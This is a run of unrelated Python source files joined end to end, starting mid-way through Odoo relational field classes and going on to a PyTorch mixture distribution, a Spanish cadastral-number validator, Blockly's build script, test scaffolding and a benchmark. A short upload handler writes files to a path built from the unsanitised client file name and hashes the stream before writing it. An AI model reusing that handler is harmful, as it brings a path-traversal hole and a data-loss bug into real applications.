value: # evaluate name_get() as superuser, because the visibility of a # many2one field value (id and name) depends on the current record's # access rights, and not the value's access rights. try: return value.sudo().name_get()[0] except MissingError: # Should not happen, unless the foreign key is missing. return False else: return value.id def convert_to_write(self, value, target=None, fnames=None): return value.id def convert_to_onchange(self, value): return value.id def convert_to_export(self, value, env): return bool(value) and value.name_get()[0][1] def convert_to_display_name(self, value): return ustr(value.display_name) class UnionUpdate(SpecialValue): """ Placeholder for a value update; when this value is taken from the cache, it returns ``record[field.name] | value`` and stores it in the cache. """ def __init__(self, field, record, value): self.args = (field, record, value) def get(self): field, record, value = self.args # in order to read the current field's value, remove self from cache del record._cache[field] # read the current field's value, and update it in cache only record._cache[field] = new_value = record[field.name] | value return new_value class _RelationalMulti(_Relational): """ Abstract class for relational fields *2many. """ def _update(self, records, value): """ Update the cached value of `self` for `records` with `value`. """ for record in records: if self in record._cache: record._cache[self] = record[self.name] | value else: record._cache[self] = UnionUpdate(self, record, value) def convert_to_cache(self, value, record, validate=True): if isinstance(value, BaseModel): if value._name == self.comodel_name: return value.with_env(record.env) elif isinstance(value, list): # value is a list of record ids or commands if not record.id: record = record.browse() # new record has no value result = record[self.name] # modify result with the commands; # beware to not introduce duplicates in result for command in value: if isinstance(command, (tuple, list)): if command[0] == 0: result += result.new(command[2]) elif command[0] == 1: result.browse(command[1]).update(command[2]) result += result.browse(command[1]) - result elif command[0] == 2: # note: the record will be deleted by write() result -= result.browse(command[1]) elif command[0] == 3: result -= result.browse(command[1]) elif command[0] == 4: result += result.browse(command[1]) - result elif command[0] == 5: result = result.browse() elif command[0] == 6: result = result.browse(command[2]) elif isinstance(command, dict): result += result.new(command) else: result += result.browse(command) - result return result elif not value: return self.null(record.env) raise ValueError("Wrong value for %s: %s" % (self, value)) def convert_to_read(self, value, use_name_get=True): return value.ids def convert_to_write(self, value, target=None, fnames=None): # remove/delete former records if target is None: set_ids = [] result = [(6, 0, set_ids)] add_existing = lambda id: set_ids.append(id) else: tag = 2 if self.type == 'one2many' else 3 result = [(tag, record.id) for record in target[self.name] - value] add_existing = lambda id: result.append((4, id)) if fnames is None: # take all fields in cache, except the inverses of self fnames = set(value._fields) - set(MAGIC_COLUMNS) for invf in self.inverse_fields: fnames.discard(invf.name) # add new and existing records for record in value: if not record.id: values = {k: v for k, v in record._cache.iteritems() if k in fnames} values = record._convert_to_write(values) result.append((0, 0, values)) elif record._is_dirty(): values = {k: record._cache[k] for k in record._get_dirty() if k in fnames} values = record._convert_to_write(values) result.append((1, record.id, values)) else: add_existing(record.id) return result def convert_to_export(self, value, env): return bool(value) and ','.join(name for id, name in value.name_get()) def convert_to_display_name(self, value): raise NotImplementedError() def _compute_related(self, records): """ Compute the related field `self` on `records`. """ for record in records: value = record # traverse the intermediate fields, and keep at most one record for name in self.related[:-1]: value = value[name][:1] record[self.name] = value[self.related[-1]] class One2many(_RelationalMulti): """ One2many field; the value of such a field is the recordset of all the records in `comodel_name` such that the field `inverse_name` is equal to the current record. :param comodel_name: name of the target model (string) :param inverse_name: name of the inverse `Many2one` field in `comodel_name` (string) :param domain: an optional domain to set on candidate values on the client side (domain or string) :param context: an optional context to use on the client side when handling that field (dictionary) :param auto_join: whether JOINs are generated upon search through that field (boolean, by default ``False``) :param limit: optional limit to use upon read (integer) The attributes `comodel_name` and `inverse_name` are mandatory except in the case of related fields or field extensions. """ type = 'one2many' inverse_name = None # name of the inverse field auto_join = False # whether joins are generated upon search limit = None # optional limit to use upon read copy = False # o2m are not copied by default def __init__(self, comodel_name=None, inverse_name=None, string=None, **kwargs): super(One2many, self).__init__( comodel_name=comodel_name, inverse_name=inverse_name, string=string, **kwargs ) def _setup_regular(self, env): super(One2many, self)._setup_regular(env) if self.inverse_name: # link self to its inverse field and vice-versa comodel = env[self.comodel_name] comodel._setup_fields() invf = comodel._fields[self.inverse_name] # In some rare cases, a `One2many` field can link to `Int` field # (res_model/res_id pattern). Only inverse the field if this is # a `Many2one` field. if isinstance(invf, Many2one): self.inverse_fields.append(invf) invf.inverse_fields.append(self) _description_relation_field = property(attrgetter('inverse_name')) _column_fields_id = property(attrgetter('inverse_name')) _column_auto_join = property(attrgetter('auto_join')) _column_limit = property(attrgetter('limit')) class Many2many(_RelationalMulti): """ Many2many field; the value of such a field is the recordset. :param comodel_name: name of the target model (string) The attribute `comodel_name` is mandatory except in the case of related fields or field extensions. :param relation: optional name of the table that stores the relation in the database (string) :param column1: optional name of the column referring to "these" records in the table `relation` (string) :param column2: optional name of the column referring to "those" records in the table `relation` (string) The attributes `relation`, `column1` and `column2` are optional. If not given, names are automatically generated from model names, provided `model_name` and `comodel_name` are different! :param domain: an optional domain to set on candidate values on the client side (domain or string) :param context: an optional context to use on the client side when handling that field (dictionary) :param limit: optional limit to use upon read (integer) """ type = 'many2many' relation = None # name of table column1 = None # column of table referring to model column2 = None # column of table referring to comodel limit = None # optional limit to use upon read def __init__(self, comodel_name=None, relation=None, column1=None, column2=None, string=None, **kwargs): super(Many2many, self).__init__( comodel_name=comodel_name, relation=relation, column1=column1, column2=column2, string=string, **kwargs ) def _setup_regular(self, env): super(Many2many, self)._setup_regular(env) if not self.relation: if isinstance(self.column, fields.many2many): self.relation, self.column1, self.column2 = \ self.column._sql_names(env[self.model_name]) if self.relation: m2m = env.registry._m2m # if inverse field has already been setup, it is present in m2m invf = m2m.get((self.relation, self.column2, self.column1)) if invf: self.inverse_fields.append(invf) invf.inverse_fields.append(self) else: # add self in m2m, so that its inverse field can find it m2m[(self.relation, self.column1, self.column2)] = self _column_rel = property(attrgetter('relation')) _column_id1 = property(attrgetter('column1')) _column_id2 = property(attrgetter('column2')) _column_limit = property(attrgetter('limit')) class Id(Field): """ Special case for field 'id'. """ store = True #: Can't write this! readonly = True def __init__(self, string=None, **kwargs): super(Id, self).__init__(type='integer', string=string, **kwargs) def to_column(self): self.column = fields.integer('ID') return self.column def __get__(self, record, owner): if record is None: return self # the field is accessed through the class owner if not record: return False return record.ensure_one()._ids[0] def __set__(self, record, value): raise TypeError("field 'id' cannot be assigned") # imported here to avoid dependency cycle issues from openerp import SUPERUSER_ID from .exceptions import Warning, AccessError, MissingError from .models import BaseModel, MAGIC_COLUMNS from .osv import fields
import torch from . import Distribution, Categorical from .. import util class Mixture(Distribution): def __init__(self, distributions, probs=None): self._distributions = distributions self.length = len(distributions) if probs is None: self._probs = util.to_tensor(torch.zeros(self.length)).fill_(1./self.length) else: self._probs = util.to_tensor(probs) self._probs = self._probs / self._probs.sum(-1, keepdim=True) self._log_probs = torch.log(util.clamp_probs(self._probs)) event_shape = torch.Size() if self._probs.dim() == 1: batch_shape = torch.Size() self._batch_length = 0 elif self._probs.dim() == 2: batch_shape = torch.Size([self._probs.size(0)]) self._batch_length = self._probs.size(0) else: raise ValueError('Expecting a 1d or 2d (batched) mixture probabilities.') self._mixing_dist = Categorical(self._probs) self._mean = None self._variance = None super().__init__(name='Mixture', address_suffix='Mixture({})'.format(', '.join([d._address_suffix for d in self._distributions])), batch_shape=batch_shape, event_shape=event_shape) def __repr__(self): return 'Mixture(distributions:({}), probs:{})'.format(', '.join([repr(d) for d in self._distributions]), self._probs) def __len__(self): return self.length def log_prob(self, value, sum=False): if self._batch_length == 0: value = util.to_tensor(value).squeeze() lp = torch.logsumexp(self._log_probs + util.to_tensor([d.log_prob(value) for d in self._distributions]), dim=0) else: value = util.to_tensor(value).view(self._batch_length) lp = torch.logsumexp(self._log_probs + torch.stack([d.log_prob(value).squeeze(-1) for d in self._distributions]).view(-1, self._batch_length).t(), dim=1) return torch.sum(lp) if sum else lp def sample(self): if self._batch_length == 0: i = int(self._mixing_dist.sample()) return self._distributions[i].sample() else: indices = self._mixing_dist.sample() dist_samples = [] for d in self._distributions: sample = d.sample() if sample.dim() == 0: sample = sample.unsqueeze(-1) dist_samples.append(sample) ret = [] for b in range(self._batch_length): i = int(indices[b]) ret.append(dist_samples[i][b]) return util.to_tensor(ret) @property def mean(self): if self._mean is None: means = torch.stack([d.mean for d in self._distributions]) if self._batch_length == 0: self._mean = torch.dot(self._probs, means) else: self._mean = torch.diag(torch.mm(self._probs, means)) return self._mean @property def variance(self): if self._variance is None: variances = torch.stack([(d.mean - self.mean).pow(2) + d.variance for d in self._distributions]) if self._batch_length == 0: self._variance = torch.dot(self._probs, variances) else: self._variance = torch.diag(torch.mm(self._probs, variances)) return self._variance
# referenciacatastral.py - functions for handling Spanish real state ids # coding: utf-8 # # Copyright (C) 2016 David García Garzón # Copyright (C) 2016-2017 Arthur de Jong # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301 USA """Referencia Catastral (Spanish real estate property id) The cadastral reference code is an identifier for real estate in Spain. It is issued by Dirección General del Catastro (General Directorate of Land Registry) of the Ministerio de Hacienda (Tresury Ministry). It has 20 digits and contains numbers and letters including the Spanish Ñ. The number consists of 14 digits for the parcel, 4 for identifying properties within the parcel and 2 check digits. The parcel digits are structured differently for urban, non-urban or special (infrastructure) cases. More information: * http://www.catastro.meh.es/esp/referencia_catastral_1.asp (Spanish) * http://www.catastro.meh.es/documentos/05042010_P.pdf (Spanish) * https://es.wikipedia.org/wiki/Catastro#Referencia_catastral >>> validate('7837301-VG8173B-0001 TT') # Lanteira town hall '7837301VG8173B0001TT' >>> validate('783301 VG8173B 0001 TT') # missing digit Traceback (most recent call last): ... InvalidLength: ... >>> validate('7837301/VG8173B 0001 TT') # not alphanumeric Traceback (most recent call last): ... InvalidFormat: ... >>> validate('7837301 VG8173B 0001 NN') # bad check digits Traceback (most recent call last): ... InvalidChecksum: ... >>> format('4A08169P03PRAT0001LR') # BCN Airport '4A08169 P03PRAT 0001 LR' """ from stdnum.exceptions import * from stdnum.util import clean alphabet = u'ABCDEFGHIJKLMNÑOPQRSTUVWXYZ0123456789' def compact(number): """Convert the number to the minimal representation. This strips the number of any valid separators and removes surrounding whitespace.""" return clean(number, ' -').strip().upper() def format(number): """Reformat the passed number to the standard format.""" number = compact(number) return ' '.join([ number[:7], number[7:14], number[14:18], number[18:] ]) # The check digit implementation is based on the Javascript # implementation by Vicente Sancho that can be found at # http://trellat.es/validar-la-referencia-catastral-en-javascript/ def _check_digit(number): """Calculate a single check digit on the provided part of the number.""" weights = (13, 15, 12, 5, 4, 17, 9, 21, 3, 7, 1) s = sum(w * (int(n) if n.isdigit() else alphabet.find(n) + 1) for w, n in zip(weights, number)) return 'MQWERTYUIOPASDFGHJKLBZX'[s % 23] def _force_unicode(number): """Convert the number to unicode.""" if not hasattr(number, 'isnumeric'): # pragma: no cover (Python 2 code) number = number.decode('utf-8') return number def calc_check_digits(number): """Calculate the check digits for the number.""" number = _force_unicode(compact(number)) return ( _check_digit(number[0:7] + number[14:18]) + _check_digit(number[7:14] + number[14:18])) def validate(number): """Checks to see if the number provided is a valid Cadastral Reference. This checks the length, formatting and check digits.""" number = compact(number) n = _force_unicode(number) if not all(c in alphabet for c in n): raise InvalidFormat() if len(n) != 20: raise InvalidLength() if calc_check_digits(n) != n[18:]: raise InvalidChecksum() return number def is_valid(number): """Checks to see if the number provided is a valid Cadastral Reference.""" try: return bool(validate(number)) except ValidationError: return False
#!/usr/bin/python2.7 # Compresses the core Blockly files into a single JavaScript file. # # Copyright 2012 Google Inc. # https://developers.google.com/blockly/ # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This script generates two versions of Blockly's core files: # blockly_compressed.js # blockly_uncompressed.js # The compressed file is a concatenation of all of Blockly's core files which # have been run through Google's Closure Compiler. This is done using the # online API (which takes a few seconds and requires an Internet connection). # The uncompressed file is a script that loads in each of Blockly's core files # one by one. This takes much longer for a browser to load, but is useful # when debugging code since line numbers are meaningful and variables haven't # been renamed. The uncompressed file also allows for a faster developement # cycle since there is no need to rebuild or recompile, just reload. # # This script also generates: # blocks_compressed.js: The compressed common blocks. # blocks_horizontal_compressed.js: The compressed Scratch horizontal blocks. # blocks_vertical_compressed.js: The compressed Scratch vertical blocks. # msg/js/<LANG>.js for every language <LANG> defined in msg/js/<LANG>.json. import sys if sys.version_info[0] != 2: raise Exception("Blockly build only compatible with Python 2.x.\n" "You are using: " + sys.version) import errno, glob, httplib, json, os, re, subprocess, threading, urllib def import_path(fullpath): """Import a file with full path specification. Allows one to import from any directory, something __import__ does not do. Args: fullpath: Path and filename of import. Returns: An imported module. """ path, filename = os.path.split(fullpath) filename, ext = os.path.splitext(filename) sys.path.append(path) module = __import__(filename) reload(module) # Might be out of date. del sys.path[-1] return module HEADER = ("// Do not edit this file; automatically generated by build.py.\n" "'use strict';\n") class Gen_uncompressed(threading.Thread): """Generate a JavaScript file that loads Blockly's raw files. Runs in a separate thread. """ def __init__(self, search_paths, vertical): threading.Thread.__init__(self) self.search_paths = search_paths self.vertical = vertical def run(self): if self.vertical: target_filename = 'blockly_uncompressed_vertical.js' else: target_filename = 'blockly_uncompressed_horizontal.js' f = open(target_filename, 'w') f.write(HEADER) f.write(""" var isNodeJS = !!(typeof module !== 'undefined' && module.exports && typeof window === 'undefined'); if (isNodeJS) { var window = {}; require('../closure-library/closure/goog/bootstrap/nodejs'); } window.BLOCKLY_DIR = (function() { if (!isNodeJS) { // Find name of current directory. var scripts = document.getElementsByTagName('script'); var re = new RegExp('(.+)[\/]blockly_uncompressed(_vertical|_horizontal|)\.js$'); for (var i = 0, script; script = scripts[i]; i++) { var match = re.exec(script.src); if (match) { return match[1]; } } alert('Could not detect Blockly\\'s directory name.'); } return ''; })(); window.BLOCKLY_BOOT = function() { var dir = ''; if (isNodeJS) { require('../closure-library/closure/goog/bootstrap/nodejs'); dir = 'blockly'; } else { // Execute after Closure has loaded. if (!window.goog) { alert('Error: Closure not found. Read this:\\n' + 'developers.google.com/blockly/guides/modify/web/closure'); } dir = window.BLOCKLY_DIR.match(/[^\\/]+$/)[0]; } """) add_dependency = [] base_path = calcdeps.FindClosureBasePath(self.search_paths) for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths): add_dependency.append(calcdeps.GetDepsLine(dep, base_path)) add_dependency = '\n'.join(add_dependency) # Find the Blockly directory name and replace it with a JS variable. # This allows blockly_uncompressed.js to be compiled on one computer and be # used on another, even if the directory name differs. m = re.search('[\\/]([^\\/]+)[\\/]core[\\/]blockly.js', add_dependency) add_dependency = re.sub('([\\/])' + re.escape(m.group(1)) + '([\\/]core[\\/])', '\\1" + dir + "\\2', add_dependency) f.write(add_dependency + '\n') provides = [] for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths): if not dep.filename.startswith(os.pardir + os.sep): # '../' provides.extend(dep.provides) provides.sort() f.write('\n') f.write('// Load Blockly.\n') for provide in provides: f.write("goog.require('%s');\n" % provide) f.write(""" delete this.BLOCKLY_DIR; delete this.BLOCKLY_BOOT; }; if (isNodeJS) { window.BLOCKLY_BOOT() module.exports = Blockly; } else { // Delete any existing Closure (e.g. Soy's nogoog_shim). document.write('<script>var goog = undefined;</script>'); // Load fresh Closure Library. document.write('<script src="' + window.BLOCKLY_DIR + '/../closure-library/closure/goog/base.js"></script>'); document.write('<script>window.BLOCKLY_BOOT();</script>'); } """) f.close() print("SUCCESS: " + target_filename) class Gen_compressed(threading.Thread): """Generate a JavaScript file that contains all of Blockly's core and all required parts of Closure, compiled together. Uses the Closure Compiler's online API. Runs in a separate thread. """ def __init__(self, search_paths_vertical, search_paths_horizontal): threading.Thread.__init__(self) self.search_paths_vertical = search_paths_vertical self.search_paths_horizontal = search_paths_horizontal def run(self): self.gen_core(True) self.gen_core(False) self.gen_blocks("horizontal") self.gen_blocks("vertical") self.gen_blocks("common") self.gen_generator("arduino") def gen_core(self, vertical): if vertical: target_filename = 'blockly_compressed_vertical.js' search_paths = self.search_paths_vertical else: target_filename = 'blockly_compressed_horizontal.js' search_paths = self.search_paths_horizontal # Define the parameters for the POST request. params = [ ("compilation_level", "SIMPLE_OPTIMIZATIONS"), ("use_closure_library", "true"), ("output_format", "json"), ("output_info", "compiled_code"), ("output_info", "warnings"), ("output_info", "errors"), ("output_info", "statistics"), ] # Read in all the source files. filenames = calcdeps.CalculateDependencies(search_paths, [os.path.join("core", "blockly.js")]) for filename in filenames: # Filter out the Closure files (the compiler will add them). if filename.startswith(os.pardir + os.sep): # '../' continue f = open(filename) params.append(("js_code", "".join(f.readlines()))) f.close() self.do_compile(params, target_filename, filenames, "") def gen_blocks(self, block_type): if block_type == "horizontal": target_filename = "blocks_compressed_horizontal.js" filenames = glob.glob(os.path.join("blocks_horizontal", "*.js")) elif block_type == "vertical": target_filename = "blocks_compressed_vertical.js" filenames = glob.glob(os.path.join("blocks_vertical", "*.js")) elif block_type == "common": target_filename = "blocks_compressed.js" filenames = glob.glob(os.path.join("blocks_common", "*.js")) # Define the parameters for the POST request. params = [ ("compilation_level", "SIMPLE_OPTIMIZATIONS"), ("output_format", "json"), ("output_info", "compiled_code"), ("output_info", "warnings"), ("output_info", "errors"), ("output_info", "statistics"), ] # Read in all the source files. # Add Blockly.Blocks to be compatible with the compiler. params.append(("js_code", "goog.provide('Blockly.Blocks');")) # Add Blockly.Colours for use of centralized colour bank filenames.append(os.path.join("core", "colours.js")) filenames.append(os.path.join("core", "constants.js")) for filename in filenames: f = open(filename) params.append(("js_code", "".join(f.readlines()))) f.close() # Remove Blockly.Blocks to be compatible with Blockly. remove = "var Blockly={Blocks:{}};" self.do_compile(params, target_filename, filenames, remove) def gen_generator(self, language): target_filename = language + "_compressed.js" # Define the parameters for the POST request. params = [ ("compilation_level", "SIMPLE_OPTIMIZATIONS"), ("output_format", "json"), ("output_info", "compiled_code"), ("output_info", "warnings"), ("output_info", "errors"), ("output_info", "statistics"), ] # Read in all the source files. # Add Blockly.Generator to be compatible with the compiler. params.append(("js_code", "goog.provide('Blockly.Generator');")) filenames = glob.glob( os.path.join("generators", language, "*.js")) filenames.insert(0, os.path.join("generators", language + ".js")) for filename in filenames: f = open(filename) params.append(("js_code", "".join(f.readlines()))) f.close() filenames.insert(0, "[goog.provide]") # Remove Blockly.Generator to be compatible with Blockly. remove = "var Blockly={Generator:{}};" self.do_compile(params, target_filename, filenames, remove) def do_compile(self, params, target_filename, filenames, remove): # Send the request to Google. headers = {"Content-type": "application/x-www-form-urlencoded"} conn = httplib.HTTPConnection("closure-compiler.appspot.com") conn.request("POST", "/compile", urllib.urlencode(params), headers) response = conn.getresponse() json_str = response.read() conn.close() # Parse the JSON response. json_data = json.loads(json_str) def file_lookup(name): if not name.startswith("Input_"): return "???" n = int(name[6:]) - 1 return filenames[n] if json_data.has_key("serverErrors"): errors = json_data["serverErrors"] for error in errors: print("SERVER ERROR: %s" % target_filename) print(error["error"]) elif json_data.has_key("errors"): errors = json_data["errors"] for error in errors: print("FATAL ERROR") print(error["error"]) if error["file"]: print("%s at line %d:" % ( file_lookup(error["file"]), error["lineno"])) print(error["line"]) print((" " * error["charno"]) + "^") sys.exit(1) else: if json_data.has_key("warnings"): warnings = json_data["warnings"] for warning in warnings: print("WARNING") print(warning["warning"]) if warning["file"]: print("%s at line %d:" % ( file_lookup(warning["file"]), warning["lineno"])) print(warning["line"]) print((" " * warning["charno"]) + "^") print() if not json_data.has_key("compiledCode"): print("FATAL ERROR: Compiler did not return compiledCode.") sys.exit(1) code = HEADER + "\n" + json_data["compiledCode"] code = code.replace(remove, "") # Trim down Google's Apache licences. # The Closure Compiler used to preserve these until August 2015. # Delete this in a few months if the licences don't return. LICENSE = re.compile("""/\\* [\w ]+ (Copyright \\d+ Google Inc.) https://developers.google.com/blockly/ Licensed under the Apache License, Version 2.0 \(the "License"\); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. \\*/""") code = re.sub(LICENSE, r"\n// \1 Apache License 2.0", code) stats = json_data["statistics"] original_b = stats["originalSize"] compressed_b = stats["compressedSize"] if original_b > 0 and compressed_b > 0: f = open(target_filename, "w") f.write(code) f.close() original_kb = int(original_b / 1024 + 0.5) compressed_kb = int(compressed_b / 1024 + 0.5) ratio = int(float(compressed_b) / float(original_b) * 100 + 0.5) print("SUCCESS: " + target_filename) print("Size changed from %d KB to %d KB (%d%%)." % ( original_kb, compressed_kb, ratio)) else: print("UNKNOWN ERROR") class Gen_langfiles(threading.Thread): """Generate JavaScript file for each natural language supported. Runs in a separate thread. """ def __init__(self): threading.Thread.__init__(self) def _rebuild(self, srcs, dests): # Determine whether any of the files in srcs is newer than any in dests. try: return (max(os.path.getmtime(src) for src in srcs) > min(os.path.getmtime(dest) for dest in dests)) except OSError as e: # Was a file not found? if e.errno == errno.ENOENT: # If it was a source file, we can't proceed. if e.filename in srcs: print("Source file missing: " + e.filename) sys.exit(1) else: # If a destination file was missing, rebuild. return True else: print("Error checking file creation times: " + e) def run(self): # The files msg/json/{en,qqq,synonyms}.json depend on msg/messages.js. if self._rebuild([os.path.join("msg", "messages.js")], [os.path.join("msg", "json", f) for f in ["en.json", "qqq.json", "synonyms.json"]]): try: subprocess.check_call([ "python", os.path.join("i18n", "js_to_json.py"), "--input_file", "msg/messages.js", "--output_dir", "msg/json/", "--quiet"]) except (subprocess.CalledProcessError, OSError) as e: # Documentation for subprocess.check_call says that CalledProcessError # will be raised on failure, but I found that OSError is also possible. print("Error running i18n/js_to_json.py: ", e) sys.exit(1) # Checking whether it is necessary to rebuild the js files would be a lot of # work since we would have to compare each <lang>.json file with each # <lang>.js file. Rebuilding is easy and cheap, so just go ahead and do it. try: # Use create_messages.py to create .js files from .json files. cmd = [ "python", os.path.join("i18n", "create_messages.py"), "--source_lang_file", os.path.join("msg", "json", "en.json"), "--source_synonym_file", os.path.join("msg", "json", "synonyms.json"), "--key_file", os.path.join("msg", "json", "keys.json"), "--output_dir", os.path.join("msg", "js"), "--quiet"] json_files = glob.glob(os.path.join("msg", "json", "*.json")) json_files = [file for file in json_files if not (file.endswith(("keys.json", "synonyms.json", "qqq.json")))] cmd.extend(json_files) subprocess.check_call(cmd) except (subprocess.CalledProcessError, OSError) as e: print("Error running i18n/create_messages.py: ", e) sys.exit(1) # Output list of .js files created. for f in json_files: # This assumes the path to the current directory does not contain "json". f = f.replace("json", "js") if os.path.isfile(f): print("SUCCESS: " + f) else: print("FAILED to create " + f) def exclude_vertical(item): return not item.endswith("block_render_svg_vertical.js") def exclude_horizontal(item): return not item.endswith("block_render_svg_horizontal.js") if __name__ == "__main__": try: calcdeps = import_path(os.path.join( os.path.pardir, "closure-library", "closure", "bin", "calcdeps.py")) except ImportError: if os.path.isdir(os.path.join(os.path.pardir, "closure-library-read-only")): # Dir got renamed when Closure moved from Google Code to GitHub in 2014. print("Error: Closure directory needs to be renamed from" "'closure-library-read-only' to 'closure-library'.\n" "Please rename this directory.") elif os.path.isdir(os.path.join(os.path.pardir, "google-closure-library")): # When Closure is installed by npm, it is named "google-closure-library". #calcdeps = import_path(os.path.join( # os.path.pardir, "google-closure-library", "closure", "bin", "calcdeps.py")) print("Error: Closure directory needs to be renamed from" "'google-closure-library' to 'closure-library'.\n" "Please rename this directory.") else: print("""Error: Closure not found. Read this: developers.google.com/blockly/guides/modify/web/closure""") sys.exit(1) search_paths = calcdeps.ExpandDirectories( ["core", os.path.join(os.path.pardir, "closure-library")]) search_paths_horizontal = filter(exclude_vertical, search_paths) search_paths_vertical = filter(exclude_horizontal, search_paths) # Run all tasks in parallel threads. # Uncompressed is limited by processor speed. # Compressed is limited by network and server speed. # Vertical: Gen_uncompressed(search_paths_vertical, True).start() # Horizontal: Gen_uncompressed(search_paths_horizontal, False).start() # Compressed forms of vertical and horizontal. Gen_compressed(search_paths_vertical, search_paths_horizontal).start() # This is run locally in a separate thread. Gen_langfiles().start()
import hashlib def handle_uploaded_file(f): img_url = 'media/image/' + CalcMD5(f) + f._name with open(img_url, 'wb+') as destination: for chunk in f.chunks(): destination.write(chunk) return ('/' + img_url, f._name) def CalcMD5(f): md5obj = hashlib.md5() md5obj.update(f.read()) hash = md5obj.hexdigest() return hash
# -*- coding: utf-8 -*- # from pytest import raises # The parametrize function is generated, so this doesn't work: # # from pytest.mark import parametrize # import pytest parametrize = pytest.mark.parametrize # from duckomatic import metadata # TODO: Importing this is broken because six.moves.urllib gives # an import error. # from duckomatic.__main__ import main class TestMain(object): def test_fake(self): pass # @parametrize('helparg', ['-h', '--help']) # def test_help(self, helparg, capsys): # with raises(SystemExit) as exc_info: # main(['progname', helparg]) # out, err = capsys.readouterr() # # Should have printed some sort of usage message. We don't # # need to explicitly test the content of the message. # assert 'usage' in out # # Should have used the program name from the argument # # vector. # assert 'progname' in out # # Should exit with zero return code. # assert exc_info.value.code == 0 # @parametrize('versionarg', ['-V', '--version']) # def test_version(self, versionarg, capsys): # with raises(SystemExit) as exc_info: # main(['progname', versionarg]) # out, err = capsys.readouterr() # # Should print out version. # assert err == '{0} {1}\n'.format(metadata.project, metadata.version) # # Should exit with zero return code. # assert exc_info.value.code == 0
# Copyright 2014 Cisco Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import random from neutron.agent.linux import ovs_lib from neutron.agent.linux import utils from neutron.common import constants as n_const from neutron.tests import base BR_PREFIX = 'test-br' class BaseLinuxTestCase(base.BaseTestCase): def setUp(self, root_helper='sudo'): super(BaseLinuxTestCase, self).setUp() self.root_helper = root_helper def check_command(self, cmd, error_text, skip_msg): try: utils.execute(cmd) except RuntimeError as e: if error_text in str(e): self.skipTest(skip_msg) raise def check_sudo_enabled(self): if os.environ.get('OS_SUDO_TESTING') not in base.TRUE_STRING: self.skipTest('testing with sudo is not enabled') def get_rand_name(self, max_length, prefix='test'): name = prefix + str(random.randint(1, 0x7fffffff)) return name[:max_length] def create_resource(self, name_prefix, creation_func, *args, **kwargs): """Create a new resource that does not already exist. :param name_prefix: The prefix for a randomly generated name :param creation_func: A function taking the name of the resource to be created as it's first argument. An error is assumed to indicate a name collision. :param *args *kwargs: These will be passed to the create function. """ while True: name = self.get_rand_name(n_const.DEV_NAME_MAX_LEN, name_prefix) try: return creation_func(name, *args, **kwargs) except RuntimeError: continue class BaseOVSLinuxTestCase(BaseLinuxTestCase): def setUp(self, root_helper='sudo'): super(BaseOVSLinuxTestCase, self).setUp(root_helper) self.ovs = ovs_lib.BaseOVS(self.root_helper) def create_ovs_bridge(self, br_prefix=BR_PREFIX): br = self.create_resource(br_prefix, self.ovs.add_bridge) self.addCleanup(br.destroy) return br
#!/usr/bin/env python # # @license Apache-2.0 # # Copyright (c) 2018 The Stdlib Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Benchmark cexp.""" from __future__ import print_function import timeit NAME = "cexp" REPEATS = 3 ITERATIONS = 1000000 def print_version(): """Print the TAP version.""" print("TAP version 13") def print_summary(total, passing): """Print the benchmark summary. # Arguments * `total`: total number of tests * `passing`: number of passing tests """ print("#") print("1.." + str(total)) # TAP plan print("# total " + str(total)) print("# pass " + str(passing)) print("#") print("# ok") def print_results(elapsed): """Print benchmark results. # Arguments * `elapsed`: elapsed time (in seconds) # Examples ``` python python> print_results(0.131009101868) ``` """ rate = ITERATIONS / elapsed print(" ---") print(" iterations: " + str(ITERATIONS)) print(" elapsed: " + str(elapsed)) print(" rate: " + str(rate)) print(" ...") def benchmark(): """Run the benchmark and print benchmark results.""" setup = "from random import random; from cmath import exp;" stmt = "re = (random()*100.0) - 50.0; im = (random()*100.0) - 50.0; y = exp(re + 1.0j * im);" t = timeit.Timer(stmt, setup=setup) print_version() for i in range(REPEATS): print("# python::" + NAME) elapsed = t.timeit(number=ITERATIONS) print_results(elapsed) print("ok " + str(i+1) + " benchmark finished") print_summary(REPEATS, REPEATS) def main(): """Run the benchmark.""" benchmark() if __name__ == "__main__": main()
